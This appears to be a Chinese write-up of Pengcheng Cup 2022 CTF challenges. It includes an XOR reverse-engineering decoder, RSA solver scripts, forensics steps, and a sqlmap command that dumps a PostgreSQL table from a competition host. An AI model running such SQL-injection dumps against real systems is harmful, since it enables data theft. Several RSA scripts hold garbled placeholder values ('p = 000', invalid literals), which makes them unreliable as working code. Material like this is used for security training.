2025年鹏程杯2022

大家好，我是讯享网，很高兴认识大家。

PCL Two By M1o

baby_re

java逆向

native层so逆向

#include <iostream> using namespace std; int main() { unsigned int key[4] = { 0x00000056, 0x00000057, 0x00000058, 0x00000059 };//native unsigned int enc[38] = {119, 9, 40, 44, 106, 83, 126, 123, 33, 87, 113, 123, 112, 93, 125, 127, 41, 82, 44, 127, 39, 3, 126, 125, 119, 87, 47, 125, 33, 6, 44, 127, 112, 0, 126, 123, 115, 24};//java key[0] ^= 'G'; key[1] ^= '2'; key[2] ^= '\x11'; key[3] ^= '\x12';//native unsigned char dec[38]; for (int i = 0; i < 38; ++i) { dec[i]=*(enc+i)^key[i%4]; } cout<<dec; }

讯享网

简单取证

桌面 secret.png

cmd: echo password = 62b041223bb9a

secret.png 内为base64解码逆序 -> zip + password -> txt

txt内为坐标

讯享网import xlsxwriter as xlwt book = xlwt.Workbook('ctfcode.xlsx') table=book.add_worksheet('flag_code') with open( 'flag.txt', 'r' ) as f: qr=f.read() qrlist=qr.split("\n") for i in qrlist: temp=i.split(' ') table.write(int(temp[0])+1,int(temp[1])+1,'1') book.close()

扫码得flag

easy_rsa

from Crypto.Util.number import * import gmpy2 def decrypt1(): c = int("27455f081ecdad3302ae359c9fb46dc601eee98f0eadbbdebfbcd1b670fa171b30316abb9999f3b80de32843afdfd30505b1f4166a03cee9fc48902b74b6e850cfd268e6917c5d84e64f7e7cd0e4a30bfe5903fb5d821d27fdc817d9c4536a8e7aea55af266abcae857a8ffff2fbaba1b44091a137c69c471c123ab0b80e250e055959c468e6e37c005105ecd7c8b48ce5e251df3eeff5da7b3d561cd98150da3575a16bee5f2524d2795fd45c1e96efc085ed45fb5f02c027aee5bca3aad0eb3e23376c0cd18b02fb05a1ff8fb1af0a3ce4bbe",16) p = int("bb602e402b68a5cfcc5cfcc63cc82e362e98cbea4bbc2dad4fec7ec33f1faec04926f0c253f56ab4c4dde6d71627fbc9ef42425b70e5ecd55314e744aab7d1ba86d1e0e21920a0bfe7d598bd09c3c377ab7c6cfea5bfdd7c16305baed0f0a31ad688bd",16) q = int("bb8d1ea24a3462ae6ec28e79f96a95770dafc95ffffa19c7c3a3786a6accba7b1a28a4fe69e558beb38e799c723ab7fdd7be14b330b118ae60e3b44483a4c94a556e810ab94bbbd0100d7c20e7494e20e0c1030e016603bd2a06c1f6e92998ab68e2d420faf47f3ee687fb6d1",16) e = int("292",16) n = p*q phi = (p-1)*(q-1) t = gmpy2.gcd(e,phi) d = gmpy2.invert(e//t,phi) m = pow(c,d,n) msg = gmpy2.iroot(m,t) if msg[1]: return long_to_bytes(msg[0]) #高位攻击得出pq def decrypt2(): c = int("3a80caebcee814e74a9d3d81b08b1130bed6edde2c0e1116abfbc1a234b9765edfc47a9d634ed4458c9b9a0d399b870adbaa2337ac62940ade08daa8a7492cdedf854d4d3a05705dba1ec623a10bd60596e891ccc7b9364fbf2eaa2392fdec0b8f7efc66e94e3f8a6f372da2235ebf2fc77c163abcac5b63cc9904d9b13c0eda6462b99dd01e8230fdfee7bca5b356ddb37ec4ec926a4e07a2bfe76b9cbbfa4b5b010ddf3e2f23b4ec42b8c8433fa4811bf1dcbeafad54a9b539feb4fdafab67034ef",16) n = int("841a5a012c104e600eca17b451d5fd37c063ada2e88f36a07e9ad66e99f35b11580cbe8b0a212ec464a6393c5895b1f97885f23ea12d2069eb6dc3cb4199fb8c6e80a4a94561c6c3499c3c02d9dc9cf216c0f44dc91701a6d9ec89981f261aaf1da588a26edd5739b32540ca6dc1ec3b035043bca06ccb489f72fcd1aa856e1cffe7f9a16bd19030d1e00095f1fd977cf4f23e47b55650ca4712d1eb089d92df032e5180d05311c938a44decc6070cd01af4c6144cdab2526e5cb919a1828bec6a4f3332bf1fa4f1c9d3516fbb158fd4fbcf8b0e67eff944efa97f5b24f9aa65",16) e = 65537 p = 000 q = 9 phi = (p-1)*(q-1) d = gmpy2.invert(e,phi) m = pow(c,d,n) return long_to_bytes(m) #nc不互素 得出pq def decrypt3(): c = int("1bd2a47a5d275ba6356e1e2bd10d6cbe540e9318c746e807a7672f3a75ccd7dba52d7f6f9cf0f8dce9705fc1785cc670b2658b05d4b24d8918fbfa920c8ffe73160c2c313b3fdbc4541ece34afa7d05271cc6fd59d08138b88c11677e6ac3b39cff525dcb19694b0388d895f53805a5e5bd8cfbe4855aaf83ebd85af7d76dcb44a2e4bdbcee7a6c1e9af411e234f130e68ad3ec647e50f65cb81393f4bd38389a2b9010fdb9054dc235acedb77a5606faf0c1ea3c7cf0d304f885d86081f8bac8b67b0f75448c5b6eb8f1cc8a0df",16) n = int("c2b17c86a8950f6dafe0ae4271cfb20c5ffda2d6b3d035afa655ed05ec16c67b18832ed887f2cea83056af079cc75c2ce43c90cce3ed02c2e07d256ff1734adeee6dc2b3b4bbf6dcfc68518d0a74e3e66f1865db95efec2321ac97f3b8e3d8de9fc9145a30a3e24e7ca9944c1e94d301c99e6189f4aa6a86f67f1d9b8fb0de4225e005bd27594cd33e36622b2cd8eb2781f0c24d33267d9fb681aab81f39d1b4a73bd17431b46a89a0e4c2c58b1e24ec63bd3fff7a16f6ef80eada3ef1db0dd2f76bfdb31979c5d1fd03f75d9d8f1c5069",16) e = 65537 q = 0000 p = 000 phi = (p-1)*(q-1) d = gmpy2.invert(e,phi) M = pow(c,d,n) m = M//(2022*1011*p) return long_to_bytes(m) if __name__ == '__main__': print(decrypt1()+decrypt2()+decrypt3())

baby_rsa

讯享网from Crypto.Util.number import * import gmpy2 e = 1049 x = 09377 c = 09270 n = (pow(2,e) - x) for q in range(215,216): if n % q == 0: break p = n // q # yafu p = 0 d = inverse(e,(p-1)*(q-1)) m = pow(c,d,n) for i in range(p-q,p): m = m*i % p print(long_to_bytes(-m%p))

easygo

python sqlmap.py -u http://192.168.1.115:8080/juice/2342 -D public -T super_secret_table -dump

sqlmap一把梭

讯享网

[17:35:58] [INFO] fetching columns for table 'super_secret_table' in database 'public' [17:35:58] [INFO] fetching entries for table 'super_secret_table' in database 'public' Database: public Table: super_secret_table [1 entry] +-----------------------------------+ | flag | +-----------------------------------+ | PCL{ 
   Postgresql_1njection_1s_3asY} | +-----------------------------------+

马后炮篇

Misc_water

ʍɐʇǝɹ‾dıɔʇnɹǝ.png 藏了两张图最后一张无用

其具体文件格式为 png+jpg(reverse)+png

其中jpg为盲水印（傅里叶变换）

得到压缩包密码 ZC4#QaWbW

得到jpg（实则png）crc爆破即可还原

babybit

虚拟硬盘镜像回收站翻到备份压缩包

用工具打开

讯享网Value Name Value Type Data OsvEncryptComplete RegQword  OsvEncryptInit RegQword

中国时区 utc+8

Windows NT时间表示从1602年1月1日UTC时间开始的100纳秒数。